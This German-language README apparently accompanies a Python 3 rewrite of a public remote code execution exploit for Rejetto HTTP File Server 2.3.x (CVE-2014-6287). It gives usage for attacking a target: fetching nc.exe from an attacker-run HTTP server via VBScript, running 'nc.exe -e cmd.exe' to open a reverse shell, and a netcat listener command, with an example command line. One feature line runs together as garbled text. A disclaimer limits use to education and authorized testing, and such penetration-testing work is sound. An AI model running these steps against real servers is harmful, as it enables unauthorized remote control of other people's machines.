Exploit für Remote-Code-Ausführung für Rejetto HTTP File Server 2.3.x (CVE-2014-6287), neu geschrieben in Python 3 für moderne offensive Sicherheitstests.
Dies ist eine Python-3-Neuimplementierung des klassischen Remote-Befehlsausführungs-Exploits (RCE), der den Rejetto HTTP File Server (HFS) v2.3.x anvisiert und die als CVE-2014-6287 identifizierte Sicherheitslücke ausnutzt.
Ursprünglich entdeckt von Avinash Kumar Thapa aka "-Acid", verbessert diese Version die Portabilität und Benutzerfreundlichkeit durch vollständige Parametrisierung und moderne Kompatibilität.
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Die unbefugte Nutzung an Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung haben, ist illegal und unethisch.
nc.exenc.exe-Reverse-Shell-Zustellung mittels VBScriptnc.exenc.exe -e cmd.exe zur Herstellung einer Reverse Shellpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444